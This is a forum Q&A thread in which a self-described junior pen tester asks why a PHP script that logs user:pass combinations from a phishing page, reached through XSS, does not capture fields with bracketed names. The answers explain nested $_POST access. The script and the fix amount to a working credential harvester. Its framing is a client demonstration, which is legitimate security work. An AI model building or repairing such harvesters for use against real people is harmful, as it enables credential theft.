I'm a (junior) pen tester and I'm trying to make a script to demonstrate the dangers of an XSS attack to a client. I've got a php script that is meant to log user:pass combos when victims (i.e. myself in the demo) are redirected to a malicious page I'm hosting.
This is the part of the source for the login:
<input type="text" id="form_login_username" name="form[login][username]" value="" class="large" />
<input type="password" id="form_login_password" name="form[login][password]" value="" class="large" />
I'm new to php so it might be something really basic that's cause the problem. Here is my php script to log the details:
<?PHP
$filename = "login_details.txt";
$username = $_POST["form[login][username]"];
$password = $_POST["form[login][password]"];
$fh = fopen($filename, "aw") or die("cannot open file");
fwrite($fh, $username . ":" . $password . "\r\n");
fclose($fh);
With this script I get:
Notice: Undefined index: form[login][username] in...
And the same for the password.
I added in isset to see if the variables are even being set, and they're not.
I know the script does work, as I tried it with a few other simple login pages and it's worked perfectly. The only difference is that the username and password post variables in this case have square brackets in them - could this be the issue? I have tr开发者_如何学JAVAied url encoding them but to no avail :(
Any ideas where I'm going wrong? Thank you =)
Because the valid way to access your variables is
$_POST['form']['login']['username']
Just perform var_dump($_POST); and see what your post contains
Try this instead, in your form name attributes...
name="formUsername"
name="formPasswd"
In your receiving script...
$username = $_POST['formUsername'];
$password = $_POST['formPasswd];
Do you have a <form action="youscript.php" method="post"> around that fields?
![Interactive visualization of a graph in python [closed]](https://www.devze.com/res/2023/04-10/09/92d32fe8c0d22fb96bd6f6e8b7d1f457.gif)
加载中,请稍侯......
精彩评论